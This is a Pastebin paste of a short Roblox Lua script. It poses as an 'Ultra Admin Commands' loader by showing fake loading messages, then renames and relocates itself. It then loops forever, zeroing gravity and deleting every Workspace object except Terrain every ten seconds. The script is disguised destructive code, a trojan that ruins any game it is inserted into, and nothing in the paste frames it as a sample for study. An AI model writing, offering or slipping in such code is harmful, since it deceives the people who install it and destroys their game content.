Advertisement
dahpiglz

Untitled

Jun 20th, 2017
121
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.50 KB | None | 0 0
  1. script.Name = ("nom8")
  2. script.Parent = game.StarterPlayer
  3. game.Players.Name = ("codedmeme")
  4. p = Instance.new("Message")
  5. p.Parent = game.Workspace
  6. p.Text = ("Loading Ultra Admin Commands")
  7. wait(5)
  8. p.Text = ("Still Loading")
  9. wait(5)
  10. p.Text = ("LOADED")
  11. wait(2)
  12. p:Remove()
  13. while true do
  14. wait(10)
  15. game.Workspace.Gravity = (0)
  16. game.StarterPlayer.LoadCharacterAppearance = false
  17. for i,v in pairs(game.Workspace:GetChildren()) do
  18. if v.Name ~= ("Terrain") then
  19. v:Remove()
  20. end
  21. end
  22. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement